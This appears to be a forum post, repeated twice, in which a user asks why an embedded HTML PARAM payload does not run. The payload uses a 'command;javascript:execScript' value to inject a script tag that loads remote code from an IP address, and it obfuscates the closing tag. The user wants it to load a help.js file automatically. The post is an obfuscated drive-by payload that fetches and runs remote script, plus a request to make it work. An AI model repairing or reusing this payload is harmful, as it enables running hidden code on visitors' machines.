D
Diogo
Hello everyone
I've got this parameter embeded in a HTML file
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"
src=\\\"http://192.168.234.2/help.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
What I would like is instead of using the help.txt I would like to use a
help.js that runs the same commands.
I thought it would just simple sustitute help.txt for the help.js but the
script doesn't run.
Can someone help me please I want it to run the help.js automaticaly.
I've got this parameter embeded in a HTML file
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"
src=\\\"http://192.168.234.2/help.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
What I would like is instead of using the help.txt I would like to use a
help.js that runs the same commands.
I thought it would just simple sustitute help.txt for the help.js but the
script doesn't run.
Can someone help me please I want it to run the help.js automaticaly.